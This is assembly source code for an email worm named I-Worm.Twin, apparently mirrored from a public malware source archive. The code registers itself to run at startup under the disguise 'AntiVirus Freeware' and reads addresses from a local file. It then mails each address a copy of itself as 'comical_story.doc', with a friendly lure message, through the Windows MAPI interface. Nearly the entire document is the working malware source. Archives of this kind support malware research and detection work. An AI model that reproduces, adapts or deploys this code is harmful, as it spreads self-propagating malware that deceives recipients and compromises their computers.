mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
198 lines
2.6 KiB
NASM
198 lines
2.6 KiB
NASM
comment #
|
|
Name : I-Worm.Twin
|
|
Author : PetiK
|
|
Date : January 30th 2002 - February 1st 2002
|
|
Size : 6656 bytes
|
|
|
|
Action : See yourself. It's not complex.
|
|
#
|
|
|
|
.586p
|
|
.model flat
|
|
.code
|
|
|
|
JUMPS
|
|
|
|
api macro a
|
|
extrn a:proc
|
|
call a
|
|
endm
|
|
|
|
include useful.inc
|
|
include myinclude.inc
|
|
|
|
start: push 50
|
|
mov esi,offset orig_worm
|
|
push esi
|
|
push 0
|
|
api GetModuleFileNameA
|
|
|
|
push 25
|
|
push esi
|
|
push 1
|
|
@pushsz "AntiVirus Freeware"
|
|
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
|
push 80000002h
|
|
api SHSetValueA
|
|
|
|
@pushsz "C:\twin.vbs"
|
|
api DeleteFileA
|
|
|
|
push 50
|
|
push offset pathname
|
|
api GetWindowsDirectoryA
|
|
@pushsz "\NetInfo.doc"
|
|
push offset pathname
|
|
api lstrcat
|
|
|
|
verif_inet:
|
|
push 0
|
|
push offset inet
|
|
api InternetGetConnectedState
|
|
dec eax
|
|
jnz verif_inet
|
|
|
|
push 0
|
|
push 0
|
|
push 3
|
|
push 0
|
|
push 1
|
|
push 80000000h
|
|
@pushsz "C:\backup.win"
|
|
api CreateFileA
|
|
inc eax
|
|
je end_worm
|
|
dec eax
|
|
xchg ebx,eax
|
|
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push 2
|
|
push 0
|
|
push ebx
|
|
api CreateFileMappingA
|
|
test eax,eax
|
|
je end_w1
|
|
xchg eax,ebp
|
|
|
|
push 0
|
|
push 0
|
|
push 0
|
|
push 4
|
|
push ebp
|
|
api MapViewOfFile
|
|
test eax,eax
|
|
je end_w2
|
|
xchg eax,esi
|
|
|
|
push 0
|
|
push ebx
|
|
api GetFileSize
|
|
cmp eax,3
|
|
jbe end_w3
|
|
|
|
scan_mail:
|
|
xor edx,edx
|
|
mov edi,offset mail_addr
|
|
push edi
|
|
p_c: lodsb
|
|
cmp al," "
|
|
je car_s
|
|
cmp al,0dh
|
|
je entr1
|
|
cmp al,0ah
|
|
je entr2
|
|
cmp al,"#"
|
|
je f_mail
|
|
cmp al,'@'
|
|
jne not_a
|
|
inc edx
|
|
not_a: stosb
|
|
jmp p_c
|
|
car_s: inc esi
|
|
jmp p_c
|
|
entr1: xor al,al
|
|
stosb
|
|
pop edi
|
|
test edx,edx
|
|
je scan_mail
|
|
call send_mail
|
|
jmp scan_mail
|
|
entr2: xor al,al
|
|
stosb
|
|
pop edi
|
|
jmp scan_mail
|
|
f_mail:
|
|
|
|
end_w3: push esi
|
|
api UnmapViewOfFile
|
|
end_w2: push ebp
|
|
api CloseHandle
|
|
end_w1: push ebx
|
|
api CloseHandle
|
|
|
|
|
|
end_worm:
|
|
push 0
|
|
api ExitProcess
|
|
|
|
send_mail:
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
push offset Message
|
|
push eax
|
|
push [sess]
|
|
api MAPISendMail
|
|
ret
|
|
|
|
.data
|
|
orig_worm db 50 dup (0)
|
|
pathname db 50 dup (0)
|
|
mail_addr db 128 dup (?)
|
|
inet dd 0
|
|
sess dd 0
|
|
|
|
subject db "A comical story for you.",0
|
|
body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
|
|
db 9,"Best Regards. You friend.",0
|
|
filename db "comical_story.doc",0
|
|
|
|
Message dd ?
|
|
dd offset subject
|
|
dd offset body
|
|
dd ?
|
|
dd ?
|
|
dd ?
|
|
dd 2
|
|
dd offset MsgFrom
|
|
dd 1
|
|
dd offset MsgTo
|
|
dd 1
|
|
dd offset Attach
|
|
|
|
MsgFrom dd ?
|
|
dd ?
|
|
dd ?
|
|
dd ?
|
|
dd ?
|
|
dd ?
|
|
|
|
MsgTo dd ?
|
|
dd 1
|
|
dd offset mail_addr
|
|
dd offset mail_addr
|
|
dd ?
|
|
dd ?
|
|
|
|
Attach dd ?
|
|
dd ?
|
|
dd ?
|
|
dd offset pathname
|
|
dd offset filename
|
|
dd ?
|
|
|
|
|
|
end start
|
|
end |